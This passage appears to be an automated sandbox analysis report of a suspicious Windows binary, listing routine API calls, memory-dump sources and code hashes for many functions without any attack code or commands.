                                                                                                                                  • MulDiv.KERNEL32(?,?,?), ref: 0421D6E6
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000000.00000002.1532392387.00000000041E1000.00000020.00001000.00020000.00000000.sdmp, Offset: 041E0000, based on PE: true
                                                                                                                                  • Associated: 00000000.00000002.1532370907.00000000041E0000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1533636704.000000000424A000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1533636704.000000000436E000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_0_2_41e0000_qDKTsL1y44.jbxd
                                                                                                                                  Yara matches
                                                                                                                                  Similarity
                                                                                                                                  • API ID:
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID:
                                                                                                                                  • Opcode ID: d69bc3aba5a3486ec98753ede914a1ad08f184e1d357aedafdfc02d9951d551f
                                                                                                                                  • Instruction ID: d072e7d1ab2bdaad22cb01ab09c328572f3c5aeb5a6007c55c43076fc781d939
                                                                                                                                  • Opcode Fuzzy Hash: d69bc3aba5a3486ec98753ede914a1ad08f184e1d357aedafdfc02d9951d551f
                                                                                                                                  • Instruction Fuzzy Hash: 29D16874B14A4ADFDB11CFA8C484AAABBF6FF49300F108959E4569B364D774F902CB50
                                                                                                                                  Uniqueness

                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                  APIs
                                                                                                                                  • GetDesktopWindow.USER32 ref: 04218155
                                                                                                                                  • GetDesktopWindow.USER32 ref: 04218285
                                                                                                                                  • SetCursor.USER32(00000000), ref: 042182DA
                                                                                                                                    • Part of subcall function 04223C30: ImageList_EndDrag.COMCTL32(?,-00000010,042182B5), ref: 04223C4C
                                                                                                                                  • SetCursor.USER32(00000000), ref: 042182C5
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000000.00000002.1532392387.00000000041E1000.00000020.00001000.00020000.00000000.sdmp, Offset: 041E0000, based on PE: true
                                                                                                                                  • Associated: 00000000.00000002.1532370907.00000000041E0000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1533636704.000000000424A000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1533636704.000000000436E000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_0_2_41e0000_qDKTsL1y44.jbxd
                                                                                                                                  Yara matches
                                                                                                                                  Similarity
                                                                                                                                  • API ID: CursorDesktopWindow$DragImageList_
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID: 617806055-0
                                                                                                                                  • Opcode ID: 432f8db706a20ec966b0569526b11c67c2a9d48d4185137a7409885e66b32620
                                                                                                                                  • Instruction ID: 3a567283aec7db757f382f8b69473c0508d54d48ebf23fcbfa47f32d71aad277
                                                                                                                                  • Opcode Fuzzy Hash: 432f8db706a20ec966b0569526b11c67c2a9d48d4185137a7409885e66b32620
                                                                                                                                  • Instruction Fuzzy Hash: 5B9112347106428FDB04EF2EE2CCA597BE1EBA9364F098594E8448B365C738EC85DB91
                                                                                                                                  Uniqueness

                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                  APIs
                                                                                                                                  • SafeArrayGetLBound.OLEAUT32(?,00000001,?), ref: 041EF603
                                                                                                                                  • SafeArrayGetUBound.OLEAUT32(?,00000001,?), ref: 041EF61F
                                                                                                                                  • SafeArrayPtrOfIndex.OLEAUT32(?,?,?), ref: 041EF696
                                                                                                                                  • VariantClear.OLEAUT32(?), ref: 041EF6BF
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000000.00000002.1532392387.00000000041E1000.00000020.00001000.00020000.00000000.sdmp, Offset: 041E0000, based on PE: true
                                                                                                                                  • Associated: 00000000.00000002.1532370907.00000000041E0000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1533636704.000000000424A000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1533636704.000000000436E000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_0_2_41e0000_qDKTsL1y44.jbxd
                                                                                                                                  Yara matches
                                                                                                                                  Similarity
                                                                                                                                  • API ID: ArraySafe$Bound$ClearIndexVariant
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID: 920484758-0
                                                                                                                                  • Opcode ID: cd7e56306b14da739c94dd26db2064fb48e8dac8868798fc3541503821c87934
                                                                                                                                  • Instruction ID: 5d4be543ba095f1bc5bc122169f71f0bcacf991c7befa09d1f02ac241e11e9a6
                                                                                                                                  • Opcode Fuzzy Hash: cd7e56306b14da739c94dd26db2064fb48e8dac8868798fc3541503821c87934
                                                                                                                                  • Instruction Fuzzy Hash: 1241E779A01A19ABDB61EF59C8D0BE9B3BCAF4C204F0441D5E949E7211DB30AF858F54
                                                                                                                                  Uniqueness

                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                  APIs
                                                                                                                                  • VirtualQuery.KERNEL32(?,?,0000001C), ref: 041EBE59
                                                                                                                                  • GetModuleFileNameA.KERNEL32(?,?,00000105), ref: 041EBE7D
                                                                                                                                  • GetModuleFileNameA.KERNEL32(041E0000,?,00000105), ref: 041EBE98
                                                                                                                                  • LoadStringA.USER32(00000000,0000FFE9,?,00000100), ref: 041EBF2E
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000000.00000002.1532392387.00000000041E1000.00000020.00001000.00020000.00000000.sdmp, Offset: 041E0000, based on PE: true
                                                                                                                                  • Associated: 00000000.00000002.1532370907.00000000041E0000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1533636704.000000000424A000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1533636704.000000000436E000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_0_2_41e0000_qDKTsL1y44.jbxd
                                                                                                                                  Yara matches
                                                                                                                                  Similarity
                                                                                                                                  • API ID: FileModuleName$LoadQueryStringVirtual
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID: 3990497365-0
                                                                                                                                  • Opcode ID: 6ce0d177713dd2b987802c0ce97263b3edabee3e93a42254fc45931021fbbf25
                                                                                                                                  • Instruction ID: c1fce9cbb10f5a8d577ab200da686c2ab561656b193adbe4f4435a32cffa1a12
                                                                                                                                  • Opcode Fuzzy Hash: 6ce0d177713dd2b987802c0ce97263b3edabee3e93a42254fc45931021fbbf25
                                                                                                                                  • Instruction Fuzzy Hash: E8411C78A046589BEB21DB6ADCC4BEAB7FDAB18304F4400E9E508E7251D774BF848F54
                                                                                                                                  Uniqueness

                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                  APIs
                                                                                                                                  • VirtualQuery.KERNEL32(?,?,0000001C), ref: 041EBE59
                                                                                                                                  • GetModuleFileNameA.KERNEL32(?,?,00000105), ref: 041EBE7D
                                                                                                                                  • GetModuleFileNameA.KERNEL32(041E0000,?,00000105), ref: 041EBE98
                                                                                                                                  • LoadStringA.USER32(00000000,0000FFE9,?,00000100), ref: 041EBF2E
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000000.00000002.1532392387.00000000041E1000.00000020.00001000.00020000.00000000.sdmp, Offset: 041E0000, based on PE: true
                                                                                                                                  • Associated: 00000000.00000002.1532370907.00000000041E0000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1533636704.000000000424A000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1533636704.000000000436E000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_0_2_41e0000_qDKTsL1y44.jbxd
                                                                                                                                  Yara matches
                                                                                                                                  Similarity
                                                                                                                                  • API ID: FileModuleName$LoadQueryStringVirtual
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID: 3990497365-0
                                                                                                                                  • Opcode ID: 9386d7ab4691533b429c56c96d61860f62456abccc8b37f8d17b74d143d6a3df
                                                                                                                                  • Instruction ID: 9edf5f3964f91ce2713a0b17ac75d28a4671aaa4732325e79f9a5f40b7734a7b
                                                                                                                                  • Opcode Fuzzy Hash: 9386d7ab4691533b429c56c96d61860f62456abccc8b37f8d17b74d143d6a3df
                                                                                                                                  • Instruction Fuzzy Hash: D3411D78A046589BEB21DB6ADCC4BEAB7ED9B18304F4400E5A508E7251D774FF848F54
                                                                                                                                  Uniqueness

                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                  APIs
                                                                                                                                  • GetKeyboardLayout.USER32(00000000), ref: 0423157D
                                                                                                                                  • GetDC.USER32(00000000), ref: 042315D2
                                                                                                                                  • GetDeviceCaps.GDI32(00000000,0000005A), ref: 042315DC
                                                                                                                                  • ReleaseDC.USER32(00000000,00000000), ref: 042315E7
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000000.00000002.1532392387.00000000041E1000.00000020.00001000.00020000.00000000.sdmp, Offset: 041E0000, based on PE: true
                                                                                                                                  • Associated: 00000000.00000002.1532370907.00000000041E0000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1533636704.000000000424A000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1533636704.000000000436E000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_0_2_41e0000_qDKTsL1y44.jbxd
                                                                                                                                  Yara matches
                                                                                                                                  Similarity
                                                                                                                                  • API ID: CapsDeviceKeyboardLayoutRelease
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID: 3331096196-0
                                                                                                                                  • Opcode ID: 8c647d4ddf319e1a1ea735481cf05d213f161f03b471706fe183a9ef03162c9b
                                                                                                                                  • Instruction ID: 56f206f7c70d338800decf77d411a09cb5d66929cac90a75e3c0bb0067318344
                                                                                                                                  • Opcode Fuzzy Hash: 8c647d4ddf319e1a1ea735481cf05d213f161f03b471706fe183a9ef03162c9b
                                                                                                                                  • Instruction Fuzzy Hash: BC3117B46102419FE740EF6ED8C4BA97BE1FB04319F4980A9E818CF352D736AC46CB54
                                                                                                                                  Uniqueness

                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                  APIs
                                                                                                                                    • Part of subcall function 04202E8C: EnterCriticalSection.KERNEL32(0427A3A0,00000000,0420183E,00000000,0420189D), ref: 04202E94
                                                                                                                                    • Part of subcall function 04202E8C: LeaveCriticalSection.KERNEL32(0427A3A0,0427A3A0,00000000,0420183E,00000000,0420189D), ref: 04202EA1
                                                                                                                                    • Part of subcall function 04202E8C: EnterCriticalSection.KERNEL32(00000038,0427A3A0,0427A3A0,00000000,0420183E,00000000,0420189D), ref: 04202EAA
                                                                                                                                    • Part of subcall function 0420614C: GetDC.USER32(00000000), ref: 042061A2
                                                                                                                                    • Part of subcall function 0420614C: GetDeviceCaps.GDI32(00000000,0000000C), ref: 042061B7
                                                                                                                                    • Part of subcall function 0420614C: GetDeviceCaps.GDI32(00000000,0000000E), ref: 042061C1
                                                                                                                                    • Part of subcall function 0420614C: CreateHalftonePalette.GDI32(00000000,00000000,?,?,?,?,04204D0F,00000000,04204D9B), ref: 042061E5
                                                                                                                                    • Part of subcall function 0420614C: ReleaseDC.USER32(00000000,00000000), ref: 042061F0
                                                                                                                                  • CreateCompatibleDC.GDI32(00000000), ref: 04204D11
                                                                                                                                  • SelectObject.GDI32(00000000,?), ref: 04204D2A
                                                                                                                                  • SelectPalette.GDI32(00000000,?,000000FF), ref: 04204D53
                                                                                                                                  • RealizePalette.GDI32(00000000), ref: 04204D5F
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000000.00000002.1532392387.00000000041E1000.00000020.00001000.00020000.00000000.sdmp, Offset: 041E0000, based on PE: true
                                                                                                                                  • Associated: 00000000.00000002.1532370907.00000000041E0000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1533636704.000000000424A000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1533636704.000000000436E000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_0_2_41e0000_qDKTsL1y44.jbxd
                                                                                                                                  Yara matches
                                                                                                                                  Similarity
                                                                                                                                  • API ID: CriticalPaletteSection$CapsCreateDeviceEnterSelect$CompatibleHalftoneLeaveObjectRealizeRelease
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID: 979337279-0
                                                                                                                                  • Opcode ID: 3801c4cc7e882643be7b68efc2b5e0d770eeccc77e635e189c6878f7350a0183
                                                                                                                                  • Instruction ID: 521ee6d1aa39dba0c4ff62ceb911041ec5317b6a23e564aac72371b2562d3aa8
                                                                                                                                  • Opcode Fuzzy Hash: 3801c4cc7e882643be7b68efc2b5e0d770eeccc77e635e189c6878f7350a0183
                                                                                                                                  • Instruction Fuzzy Hash: 3131E274B10618EFE714EB59C980D5DB3F5FF48324BA285A1A904AB3A2D730FE41DA50
                                                                                                                                  Uniqueness

                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                  APIs
                                                                                                                                  • GetMenuState.USER32(?,?,?), ref: 04213B7F
                                                                                                                                  • GetSubMenu.USER32(?,?), ref: 04213B8A
                                                                                                                                  • GetMenuItemID.USER32(?,?), ref: 04213BA3
                                                                                                                                  • GetMenuStringA.USER32(?,?,?,?,?), ref: 04213BF6
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000000.00000002.1532392387.00000000041E1000.00000020.00001000.00020000.00000000.sdmp, Offset: 041E0000, based on PE: true
                                                                                                                                  • Associated: 00000000.00000002.1532370907.00000000041E0000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1533636704.000000000424A000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1533636704.000000000436E000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_0_2_41e0000_qDKTsL1y44.jbxd
                                                                                                                                  Yara matches
                                                                                                                                  Similarity
                                                                                                                                  • API ID: Menu$ItemStateString
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID: 306270399-0
                                                                                                                                  • Opcode ID: fb3a58c3da9fc6d7ae6682bba016efb31c07ea6290ae3b7c05858ba206872267
                                                                                                                                  • Instruction ID: 18f466e1b29d4fcb90571f2cac90a6d94a58e32799c0226622d61d6e42a01ca1
                                                                                                                                  • Opcode Fuzzy Hash: fb3a58c3da9fc6d7ae6682bba016efb31c07ea6290ae3b7c05858ba206872267
                                                                                                                                  • Instruction Fuzzy Hash: 6E117F35320114AFEB10EE6DCCC0EAF7BE99F59264B104469FD19D72A0E630BE01D7A0
                                                                                                                                  Uniqueness

                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                  APIs
                                                                                                                                  • GetCurrentThreadId.KERNEL32 ref: 041FD6EF
                                                                                                                                  • GetCurrentThreadId.KERNEL32 ref: 041FD6FE
                                                                                                                                  • EnterCriticalSection.KERNEL32(0427A2EC), ref: 041FD743
                                                                                                                                  • InterlockedExchange.KERNEL32(0424AAF0,?), ref: 041FD75F
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000000.00000002.1532392387.00000000041E1000.00000020.00001000.00020000.00000000.sdmp, Offset: 041E0000, based on PE: true
                                                                                                                                  • Associated: 00000000.00000002.1532370907.00000000041E0000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1533636704.000000000424A000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1533636704.000000000436E000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_0_2_41e0000_qDKTsL1y44.jbxd
                                                                                                                                  Yara matches
                                                                                                                                  Similarity
                                                                                                                                  • API ID: CurrentThread$CriticalEnterExchangeInterlockedSection
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID: 2380408948-0
                                                                                                                                  • Opcode ID: b36cc0acbe39077cb09b014c78590d19391d9d96ffbdb8ebf0bd654b86520d6a
                                                                                                                                  • Instruction ID: 479551d89f214ea34a73268d9adc7b3618184e0bdffd9934dc5e241b7c94f7f4
                                                                                                                                  • Opcode Fuzzy Hash: b36cc0acbe39077cb09b014c78590d19391d9d96ffbdb8ebf0bd654b86520d6a
                                                                                                                                  • Instruction Fuzzy Hash: 1321CF34B04A44AFE710DBA9ECC5B79B7B8EB05708F9185A4EA02D7250D775B842CB61
                                                                                                                                  Uniqueness

                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                  APIs
                                                                                                                                  • EnumWindows.USER32(Function_00052CA4), ref: 04232D49
                                                                                                                                  • GetWindow.USER32(00000003,00000003), ref: 04232D61
                                                                                                                                  • GetWindowLongA.USER32(00000000,000000EC), ref: 04232D6E
                                                                                                                                  • SetWindowPos.USER32(00000000,00000213,00000000,00000000,00000000,00000000,00000213,00000000,000000EC,00000003,00000003), ref: 04232DAD
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000000.00000002.1532392387.00000000041E1000.00000020.00001000.00020000.00000000.sdmp, Offset: 041E0000, based on PE: true
                                                                                                                                  • Associated: 00000000.00000002.1532370907.00000000041E0000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1533636704.000000000424A000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1533636704.000000000436E000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_0_2_41e0000_qDKTsL1y44.jbxd
                                                                                                                                  Yara matches
                                                                                                                                  Similarity
                                                                                                                                  • API ID: Window$EnumLongWindows
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID: 4191631535-0
                                                                                                                                  • Opcode ID: 13fc44ea40636d926eb4e80b68c1371ecc92ce0ffe3ed32542d05a69e42b0e7f
                                                                                                                                  • Instruction ID: 480cc745eaac0ed17de1ef2c377a424a997de13616a939ca6e42b9f09175c8da
                                                                                                                                  • Opcode Fuzzy Hash: 13fc44ea40636d926eb4e80b68c1371ecc92ce0ffe3ed32542d05a69e42b0e7f
                                                                                                                                  • Instruction Fuzzy Hash: C7115A757146109FEB20AA2CDCC5FA977A4EF05725F5502A4FEA8EB2D2C370B841C7A1
                                                                                                                                  Uniqueness

                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                  APIs
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000000.00000002.1532392387.00000000041E1000.00000020.00001000.00020000.00000000.sdmp, Offset: 041E0000, based on PE: true
                                                                                                                                  • Associated: 00000000.00000002.1532370907.00000000041E0000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1533636704.000000000424A000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1533636704.000000000436E000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_0_2_41e0000_qDKTsL1y44.jbxd
                                                                                                                                  Yara matches
                                                                                                                                  Similarity
                                                                                                                                  • API ID:
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID:
                                                                                                                                  • Opcode ID: 252c6770106a75361df70907076199b145203d4218c02a64cf2bf0741655b85d
                                                                                                                                  • Instruction ID: 18af632b2fdc4912444116edbf9e1609aae87291583c18dfb4ceed71edeac078
                                                                                                                                  • Opcode Fuzzy Hash: 252c6770106a75361df70907076199b145203d4218c02a64cf2bf0741655b85d
                                                                                                                                  • Instruction Fuzzy Hash: CF014B2470560C6B9734BD2A5CC4F6B3A9DDFE1654B404138782D8B312EA66FC15C2A8
                                                                                                                                  Uniqueness

                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                  APIs
                                                                                                                                  • GetWindowThreadProcessId.USER32(00000000), ref: 04217F35
                                                                                                                                  • GetCurrentProcessId.KERNEL32(00000000,?,?,-00000010,00000000,04217FA0,-000000F7,?,00000000,04217B5A,?,-00000010,?), ref: 04217F3E
                                                                                                                                  • GlobalFindAtomA.KERNEL32(00000000), ref: 04217F53
                                                                                                                                  • GetPropA.USER32(00000000,00000000), ref: 04217F6A
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000000.00000002.1532392387.00000000041E1000.00000020.00001000.00020000.00000000.sdmp, Offset: 041E0000, based on PE: true
                                                                                                                                  • Associated: 00000000.00000002.1532370907.00000000041E0000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1533636704.000000000424A000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1533636704.000000000436E000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_0_2_41e0000_qDKTsL1y44.jbxd
                                                                                                                                  Yara matches
                                                                                                                                  Similarity
                                                                                                                                  • API ID: Process$AtomCurrentFindGlobalPropThreadWindow
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID: 2582817389-0
                                                                                                                                  • Opcode ID: deaab41f2c822bc84a1f27229963b3ad5c287f55b05d5a38985f61e77cf54e62
                                                                                                                                  • Instruction ID: 3d5a030d46a1482ad8fdecaa60d3119be87364c2fc6038c6a98a35c5ce9b08c8
                                                                                                                                  • Opcode Fuzzy Hash: deaab41f2c822bc84a1f27229963b3ad5c287f55b05d5a38985f61e77cf54e62
                                                                                                                                  • Instruction Fuzzy Hash: 04F0A01932A92267BB107BAA6DC487F21CC9EE07687944031FC00C3060D758FD4191B5
                                                                                                                                  Uniqueness

                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                  APIs
                                                                                                                                  • GetWindowThreadProcessId.USER32(?), ref: 04216FD5
                                                                                                                                  • GetCurrentProcessId.KERNEL32(?,00000000,?,04213C39,?,04212CF5), ref: 04216FDE
                                                                                                                                  • GlobalFindAtomA.KERNEL32(00000000), ref: 04216FF3
                                                                                                                                  • GetPropA.USER32(?,00000000), ref: 0421700A
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000000.00000002.1532392387.00000000041E1000.00000020.00001000.00020000.00000000.sdmp, Offset: 041E0000, based on PE: true
                                                                                                                                  • Associated: 00000000.00000002.1532370907.00000000041E0000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1533636704.000000000424A000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1533636704.000000000436E000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_0_2_41e0000_qDKTsL1y44.jbxd
                                                                                                                                  Yara matches
                                                                                                                                  Similarity
                                                                                                                                  • API ID: Process$AtomCurrentFindGlobalPropThreadWindow
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID: 2582817389-0
                                                                                                                                  • Opcode ID: 41f8136ad7f3f1b238d8fb1c3ca991a4d6cc92db8a858b8c1ff75c332c12098b
                                                                                                                                  • Instruction ID: 0b27f241ba7fbb5e352f56939f6db4e77d9f83f00787d41464a3e7eb92a5a918
                                                                                                                                  • Opcode Fuzzy Hash: 41f8136ad7f3f1b238d8fb1c3ca991a4d6cc92db8a858b8c1ff75c332c12098b
                                                                                                                                  • Instruction Fuzzy Hash: 18F03059711711A6AB20BBFA6CC4A3F66CC8AA46A53440821FD01C7121D716FC4192B1
                                                                                                                                  Uniqueness

                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                  APIs
                                                                                                                                  • GetCurrentThreadId.KERNEL32 ref: 04232514
                                                                                                                                  • SetWindowsHookExA.USER32(00000003,042324B8,00000000,00000000), ref: 04232524
                                                                                                                                  • CreateEventA.KERNEL32(00000000,00000000,00000000,00000000), ref: 0423253F
                                                                                                                                  • CreateThread.KERNEL32(00000000,000003E8,0423245C,00000000,00000000), ref: 04232563
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000000.00000002.1532392387.00000000041E1000.00000020.00001000.00020000.00000000.sdmp, Offset: 041E0000, based on PE: true
                                                                                                                                  • Associated: 00000000.00000002.1532370907.00000000041E0000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1533636704.000000000424A000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1533636704.000000000436E000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_0_2_41e0000_qDKTsL1y44.jbxd
                                                                                                                                  Yara matches
                                                                                                                                  Similarity
                                                                                                                                  • API ID: CreateThread$CurrentEventHookWindows
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID: 1195359707-0
                                                                                                                                  • Opcode ID: 39e63b824e0d2ce06d890f22d58fa9c1bffa2c4133c0460dd9abd1f3360e480f
                                                                                                                                  • Instruction ID: 38a2be7154bc7d04cf9e210fb19275a2b6bc79c83ef002abc06d396294e7920f
                                                                                                                                  • Opcode Fuzzy Hash: 39e63b824e0d2ce06d890f22d58fa9c1bffa2c4133c0460dd9abd1f3360e480f
                                                                                                                                  • Instruction Fuzzy Hash: 7EF0FEB4F94345BEF724AB29BC5AF2D36B4D710B67F5050E5F2056A0C0C7B839818B25
                                                                                                                                  Uniqueness

                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                  APIs
                                                                                                                                  • GetDC.USER32(00000000), ref: 04207621
                                                                                                                                  • SelectObject.GDI32(00000000,058A00B4), ref: 04207633
                                                                                                                                  • GetTextMetricsA.GDI32(00000000), ref: 0420763E
                                                                                                                                  • ReleaseDC.USER32(00000000,00000000), ref: 0420764F
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000000.00000002.1532392387.00000000041E1000.00000020.00001000.00020000.00000000.sdmp, Offset: 041E0000, based on PE: true
                                                                                                                                  • Associated: 00000000.00000002.1532370907.00000000041E0000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1533636704.000000000424A000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1533636704.000000000436E000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_0_2_41e0000_qDKTsL1y44.jbxd
                                                                                                                                  Yara matches
                                                                                                                                  Similarity
                                                                                                                                  • API ID: MetricsObjectReleaseSelectText
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID: 2013942131-0
                                                                                                                                  • Opcode ID: a83df69b3a71b89c621d9e8b0b1fa90cd343817c16df7bf384bff0d0ec10f09c
                                                                                                                                  • Instruction ID: e1a5552733addb61eb8a54c0551b622f4596e1d4a25a5cf0afd1b9bf67bb25fc
                                                                                                                                  • Opcode Fuzzy Hash: a83df69b3a71b89c621d9e8b0b1fa90cd343817c16df7bf384bff0d0ec10f09c
                                                                                                                                  • Instruction Fuzzy Hash: 97E04F5175396223E711326A5CC1BBB7A8C8F525A5FC81161FD549A2C6DB05F90083FA
                                                                                                                                  Uniqueness

                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                  APIs
                                                                                                                                    • Part of subcall function 042014D8: EnterCriticalSection.KERNEL32(?,04201515), ref: 042014DC
                                                                                                                                  • CompareStringA.KERNEL32(00000400,00000001,00000000,?,00000000,Default,00000000,042023EC,?,00000000,04202414), ref: 04202327
                                                                                                                                  • CreateFontIndirectA.GDI32(?), ref: 042023C9
                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000000.00000002.1532392387.00000000041E1000.00000020.00001000.00020000.00000000.sdmp, Offset: 041E0000, based on PE: true
                                                                                                                                  • Associated: 00000000.00000002.1532370907.00000000041E0000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1533636704.000000000424A000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1533636704.000000000436E000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_0_2_41e0000_qDKTsL1y44.jbxd
                                                                                                                                  Yara matches
                                                                                                                                  Similarity
                                                                                                                                  • API ID: CompareCreateCriticalEnterFontIndirectSectionString
                                                                                                                                  • String ID: Default
                                                                                                                                  • API String ID: 249151401-753088835
                                                                                                                                  • Opcode ID: 90d04e02974a06f65b784dbc63e144878ab6ecb7c3416654c4618193e91c995a
                                                                                                                                  • Instruction ID: 81e9d346986af85f7dd4f849955c5b59446c81d3ecd840e63adb1c6a837d46bc
